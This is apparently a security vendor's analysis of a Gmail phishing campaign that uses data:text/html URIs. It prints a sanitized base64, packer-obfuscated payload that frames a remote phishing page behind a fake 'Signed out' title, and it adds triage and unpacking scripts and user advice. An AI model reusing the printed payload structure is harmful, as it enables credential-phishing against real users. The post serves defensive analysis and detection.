Recently there has been a wave of phishing scams targeting Google users. The spam delivers either a PDF file or a Word document containing a link, and in some cases simply a plain email containing the link. It should be noted that some of the best researchers have been fooled by this method.
The link is actually an HTML body embedded in a URI, i.e. data:text/html, also known as the Data URI scheme, which is supported by all modern browsers. One can even turn the browser into an instant notepad: all you need to do is copy and paste the following into the browser's URL bar and hit Enter.
data:text/html, <html contenteditable>
Or display a red dot:
data:text/html,<img src="AAFCAYAAACNbyblAAAAHElEQVQI12P4//8/w38GIAXDIBKE0DHxgljNBAAO9TXL0Y4OHwAAAABJRU5ErkJggg==" alt="Red dot" />
This isn't a new method; what is new is that spammers are now actively targeting Gmail users.
The code presented here has been sanitized. If we look closely at the Data URI, it contains a script that has been Base64-encoded.
Sanitized code:
data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue <script src=data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4oYzxhPycnOmUocGFyc2VJbnQoYy9hKSkpKygoYz1jJWEpPjM1P1N0cmluZy5mcm9tQ2hhckNvZGUoYysyOSk6Yy50b1N0cmluZygzNikpfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKXtkW2UoYyldPWtbY118fGUoYyl9az1bZnVuY3Rpb24oZSl7cmV0dXJuIGRbZV19XTtlPWZ1bmN0aW9uKCl7cmV0dXJuJ1xcdysnfTtjPTF9O3doaWxlKGMtLSl7aWYoa1tjXSl7cD1wLnJlcGxhY2UobmV3IFJlZ0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSl9fXJldHVybiBwfSgnMy4yLmo9ImkgaCBrIGwgbiI7bXsoZygpe2YgMT0zLjIuOShcJzFcJyk7MS44PVwnNy94LTRcJzsxLmE9XCdiIDRcJzsxLmM9XCdcJzsyLnAoXCdCXCcpWzBdLkMoMSl9KCkpfUUoZSl7fTMuMi56Lnk9Ijw2IHM9XFwicjovL3EudC91L3cudlxcIiBvPVxcIkQ6IDA7QTogNSU7ZDo1JVxcIj48LzY+IjsnLDQxLDQxLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWNvbnwxMDB8aWZyYW1lfGltYWdlfHR5cGV8Y3JlYXRlRWxlbWVudHxyZWx8c2hvcnRjdXR8aHJlZnxoZWlnaHR8fHZhcnxmdW5jdGlvbnxoYXZlfFlvdXx0aXRsZXxiZWVufFNpZ25lZHx0cnl8b3V0fHN0eWxlfGdldEVsZW1lbnRzQnlUYWdOYW1lfF9yb3NldHRhdHJhbnNsYXRpb258aHR0cHxzcmN8dG9wfG91cmNsaWVudHN8aHRtbHxvcmVpd258fG91dGVySFRNTHxib2R5fHdpZHRofGhlYWR8YXBwZW5kQ2hpbGR8Ym9yZGVyfGNhdGNoJy5zcGxpdCgnfCcpLDAse30pKQ==></script>
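As an added illustration (example code written for this article, not part of the original post or of any eScan tooling), here is a small Node.js triage script that applies the observations above to a link target before anyone opens it: it reports the scheme, decodes a data: URI without rendering it, and looks inside the HTML for a nested base64 script carrying the eval(function(p,a,c,k,e,d) packer wrapper. The sample link is constructed inside the code and uses a harmless stand-in script in place of the campaign's payload; the Buffer API assumes Node.js.

```javascript
// Added example (not from the article): triage a link target the way the
// article describes, without rendering it. Node.js is assumed (Buffer for
// base64); everything below, including the sample link, is constructed here.

// Signature of the Dean Edwards style "p,a,c,k,e,d" packer wrapper.
const PACKER_SIGNATURE = /eval\(function\(p,a,c,k,e,[dr]\)/;

// Return the scheme of a link target, or 'relative' if it has none.
function classifyLink(href) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(href.trim());
  if (!m) return 'relative';
  const scheme = m[1].toLowerCase();
  return ['http', 'https', 'data', 'javascript'].includes(scheme) ? scheme : 'other';
}

// Split a data: URI into media type, encoding flag and decoded body
// (RFC 2397 shape: data:[<mediatype>][;base64],<data>). Returns null if malformed.
function parseDataUri(uri) {
  const m = /^data:([^,]*?)(;base64)?,([\s\S]*)$/i.exec(uri.trim());
  if (!m) return null;
  const isBase64 = Boolean(m[2]);
  let body;
  if (isBase64) {
    body = Buffer.from(m[3], 'base64').toString('utf8');
  } else {
    try { body = decodeURIComponent(m[3]); } catch (e) { body = m[3]; }
  }
  return { mediaType: m[1] || 'text/plain', isBase64, body };
}

// Collect every <script src="data:..."> inside an HTML body and decode it.
function extractDataUriScripts(html) {
  const re = /<script\b[^>]*?\ssrc\s*=\s*["']?(data:[^"'\s>]+)/gi;
  const scripts = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const parsed = parseDataUri(m[1]);
    if (parsed) scripts.push(parsed);
  }
  return scripts;
}

// Produce a list of findings for one link target.
function inspectLink(href) {
  const report = { scheme: classifyLink(href), findings: [] };
  if (report.scheme !== 'data') return report;
  report.findings.push('data: URI in the address bar; content is carried by the link itself');
  const outer = parseDataUri(href);
  if (!outer) {
    report.findings.push('malformed data: URI');
    return report;
  }
  if (!/^text\/html/i.test(outer.mediaType)) return report;
  report.findings.push('text/html payload: the link can render a complete page');
  // Text placed before the first tag is what the address bar shows to the victim.
  if (/https?:\/\//i.test(outer.body.split('<')[0])) {
    report.findings.push('look-alike URL text before the first tag');
  }
  for (const script of extractDataUriScripts(outer.body)) {
    report.findings.push('script delivered through a nested data: URI (' + (script.isBase64 ? 'base64' : 'plain') + ')');
    if (PACKER_SIGNATURE.test(script.body)) report.findings.push('p,a,c,k,e,d packer signature');
    if (/\beval\s*\(/.test(script.body)) report.findings.push('eval() present');
  }
  return report;
}

// Constructed sample shaped like the article's link: a text/html data: URI that
// starts with a Google-looking URL and then loads a tiny packed script through
// a nested base64 data: URI. The script body is a harmless stand-in, not the
// campaign's payload.
const SAMPLE_SCRIPT =
  "eval(function(p,a,c,k,e,d){return p}('0 1',2,2,'constructed|sample'.split('|'),0,{}))";
const SAMPLE_LINK =
  'data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue ' +
  '<script src=data:text/html;base64,' + Buffer.from(SAMPLE_SCRIPT).toString('base64') + '></script>';

console.log(JSON.stringify(inspectLink(SAMPLE_LINK), null, 2));
```

Run with `node inspect.js`; the report for the constructed sample lists the data: scheme, the look-alike Google URL text, the nested base64 script, the packer signature and the eval() call, while a plain https://accounts.google.com/ link produces no findings. The same functions can be pointed at links extracted from a mail gateway or proxy log.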
After we decode the string, we come across a packer function. These functions are generally used to obfuscate the underlying code; however, from a reversing point of view it is important to know that almost every packer has to use "eval", the built-in JavaScript function that evaluates/executes JavaScript code or expressions. Here the eval call is clearly visible (numerous other packers exist). We replace eval with alert, which, when executed, shows us the unpacked code in an alert box.
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3.2.j="i h k l n";m{(g(){f 1=3.2.9(\'1\');1.8=\'7/x-4\';1.a=\'b 4\';1.c=\'\';2.p(\'B\')[0].C(1)}())}E(e){}3.2.z.y="<6 s=\\"r://q.t/u/w.v\\" o=\\"D: 0;A: 5%;d:5%\\"></6>";',41,41,'|link|document|window|icon|100|iframe|image|type|createElement|rel|shortcut|href|height||var|function|have|You|title|been|Signed|try|out|style|getElementsByTagName|_rosettatranslation|http|src|top|ourclients|html|oreiwn||outerHTML|body|width|head|appendChild|border|catch'.split('|'),0,{}))
We replace eval with alert and repack the code using Base64:
data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue <script src=data:text/html;base64,YWxlcnQoZnVuY3Rpb24ocCxhLGMsayxlLGQpe2U9ZnVuY3Rpb24oYyl7cmV0dXJuKGM8YT8nJzplKHBhcnNlSW50KGMvYSkpKSsoKGM9YyVhKT4zNT9TdHJpbmcuZnJvbUNoYXJDb2RlKGMrMjkpOmMudG9TdHJpbmcoMzYpKX07aWYoIScnLnJlcGxhY2UoL14vLFN0cmluZykpe3doaWxlKGMtLSl7ZFtlKGMpXT1rW2NdfHxlKGMpfWs9W2Z1bmN0aW9uKGUpe3JldHVybiBkW2VdfV07ZT1mdW5jdGlvbigpe3JldHVybidcXHcrJ307Yz0xfTt3aGlsZShjLS0pe2lmKGtbY10pe3A9cC5yZXBsYWNlKG5ldyBSZWdFeHAoJ1xcYicrZShjKSsnXFxiJywnZycpLGtbY10pfX1yZXR1cm4gcH0oJzMuMi5qPSJpIGggayBsIG4iO217KGcoKXtmIDE9My4yLjkoXCcxXCcpOzEuOD1cJzcveC00XCc7MS5hPVwnYiA0XCc7MS5jPVwnXCc7Mi5wKFwnQlwnKVswXS5DKDEpfSgpKX1FKGUpe30zLjIuei55PSI8NiBzPVxcInI6Ly9xLnQvdS93LnZcXCIgbz1cXCJEOiAwO0E6IDUlO2Q6NSVcXCI+PC82PiI7Jyw0MSw0MSwnfGxpbmt8ZG9jdW1lbnR8d2luZG93fGljb258MTAwfGlmcmFtZXxpbWFnZXx0eXBlfGNyZWF0ZUVsZW1lbnR8cmVsfHNob3J0Y3V0fGhyZWZ8aGVpZ2h0fHx2YXJ8ZnVuY3Rpb258aGF2ZXxZb3V8dGl0bGV8YmVlbnxTaWduZWR8dHJ5fG91dHxzdHlsZXxnZXRFbGVtZW50c0J5VGFnTmFtZXxfcm9zZXR0YXRyYW5zbGF0aW9ufGh0dHB8c3JjfHRvcHxvdXJjbGllbnRzfGh0bWx8b3JlaXdufHxvdXRlckhUTUx8Ym9keXx3aWR0aHxoZWFkfGFwcGVuZENoaWxkfGJvcmRlcnxjYXRjaCcuc3BsaXQoJ3wnKSwwLHt9KSk=></script>
When we copy and paste this Data URI into the browser URL bar we are able to view the original (unpacked) code. From this code it is quite evident that an iframe has been used to display the phishing page, which is retrieved from http://_rosettatranslation.top. However, this won't happen in this case, since:
1. The domain _rosettatranslation.top cannot exist, as it begins with an underscore.
2. We have used alert instead of eval.
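The same unpacking can be done without running anything at all. The following added example (written for this article, not code from the original post) re-implements the packer bootstrap shown above as plain string substitution, which is exactly what the packer's own `while(c--)` loop does before handing the result to eval. It runs that substitution over the four arguments copied from the sanitized payload, so the original code, including the iframe pointing at the sanitized _rosettatranslation.top domain, is recovered with neither eval nor alert. The helper `extractUrls` is an addition here, not part of the packer.

```javascript
// Added example (not from the article): a pure re-implementation of the
// p,a,c,k,e,d unpacker. It reproduces what the packer's own bootstrap does
// using string replacement only, so nothing in the payload is evaluated.
// The four packer arguments below are copied from the sanitized payload
// shown in the article (the iframe domain is the article's sanitized one).

// Mirrors the packer's e(c): write an index in base `radix`, using 0-9a-z
// for digits below 36 and A-Z (char code + 29) for digits 36 and above.
function encodeIndex(index, radix) {
  const high = index < radix ? '' : encodeIndex(Math.floor(index / radix), radix);
  const low = index % radix;
  return high + (low > 35 ? String.fromCharCode(low + 29) : low.toString(36));
}

// Rebuild the token dictionary and substitute every \w+ token, exactly as
// the packer's bootstrap would, but without eval.
function unpack(p, a, c, k) {
  const dict = new Map();
  for (let i = 0; i < c; i++) {
    const token = encodeIndex(i, a);
    dict.set(token, k[i] || token); // empty slot: the token stands for itself
  }
  return p.replace(/\b\w+\b/g, (word) => (dict.has(word) ? dict.get(word) : word));
}

// Pull http(s) URLs out of unpacked code for blocklisting / hunting.
function extractUrls(code) {
  return code.match(/https?:\/\/[^\s"'\\<>]+/g) || [];
}

// The packer call's arguments as they appear in the article's sanitized payload.
const PAGE_P = '3.2.j="i h k l n";m{(g(){f 1=3.2.9(\'1\');1.8=\'7/x-4\';1.a=\'b 4\';1.c=\'\';2.p(\'B\')[0].C(1)}())}E(e){}3.2.z.y="<6 s=\\"r://q.t/u/w.v\\" o=\\"D: 0;A: 5%;d:5%\\"></6>";';
const PAGE_A = 41;
const PAGE_C = 41;
const PAGE_K = '|link|document|window|icon|100|iframe|image|type|createElement|rel|shortcut|href|height||var|function|have|You|title|been|Signed|try|out|style|getElementsByTagName|_rosettatranslation|http|src|top|ourclients|html|oreiwn||outerHTML|body|width|head|appendChild|border|catch'.split('|');

function unpackPagePayload() {
  return unpack(PAGE_P, PAGE_A, PAGE_C, PAGE_K);
}

const unpacked = unpackPagePayload();
console.log(unpacked);
console.log('URLs referenced:', extractUrls(unpacked));
```

The recovered code sets the tab title to "You have been Signed out", adds an empty favicon link, and replaces the document body with a full-size iframe whose src is the sanitized http://_rosettatranslation.top/ourclients/oreiwn.html, which is what the article's alert-based unpacking shows too. Because the substitution is a pure function, the same `unpack` can be applied to any p,a,c,k,e,d payload pulled from a proxy log or a quarantined attachment without giving the sample a chance to execute.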
Unpacking Packed JavaScript
Packers have been used extensively by drive-by downloads, DGA (Domain Generation Algorithm) based malware, exploit kits, etc. in order to serve malicious pages. Sometimes it is easy to extract the code in a harmless manner, and sometimes it takes a lot of ingenuity to extract/reverse it. According to Google it is the prerogative of the end user to ensure the sanity/validity of the contents of the URL bar; however, Google users always have the option of implementing two-factor authentication, as rightly suggested by Google. When the targeted site doesn't use TFA, or is a corporate login page against which a spear-phishing campaign has been initiated, the user has to be really attentive.
Over the past many years there have been various methods to deliver the spam and entice the user to visit the malicious pages, although what hasn't changed is the phishing page itself, due to which, whenever such attempts are made against a computer system protected by the eScan Smart Web-Filter, they get detected and blocked. Since the present campaign is targeting Gmail users, here are some tips to keep you safe:
1. Stay alert: be aware of the contents of the browser's URL bar, ensure that the URL always begins with http/https, and if it begins with data then be extra careful.
2. Browsers show distinct colour-coded warnings while visiting HTTP/HTTPS sites.
3. Use/implement two-factor authentication whenever and wherever possible.